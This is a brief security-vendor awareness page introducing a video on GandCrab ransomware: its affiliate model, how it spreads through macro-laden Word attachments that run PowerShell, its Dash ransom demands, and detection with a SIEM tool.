GandCrab ransomware encrypts victims’ files and demands ransom payment for data access. It follows an affiliate marketing business model, where low-level cybercriminals find new victims, and the threat authors improve their creation. A malicious spam mail containing a Microsoft Word attachment with a macro to execute PowerShell command downloads the ransomware onto the victim's system.
Ransom notes are placed prominently on the victim’s computer, directing them to a website on the Dark Web where they can decrypt one file of their choosing for free. Ransom payments are made through a cryptocurrency called Dash, and the ransom demands set by the affiliate can range between $600 and $600,000.
A SIEM solution with the MITRE ATT&CK matrix can detect malicious abuse of PowerShell activity in your network, preventing malware download and ensuring protection.
In this video, we talk about what GandCrab is, how it spreads, and ways to mitigate this ransomware Watch the video to learn more—three minutes is all it takes!
You will receive regular updates on the latest news on cybersecurity.
© 2021 Zoho Corporation Pvt. Ltd. All rights reserved.
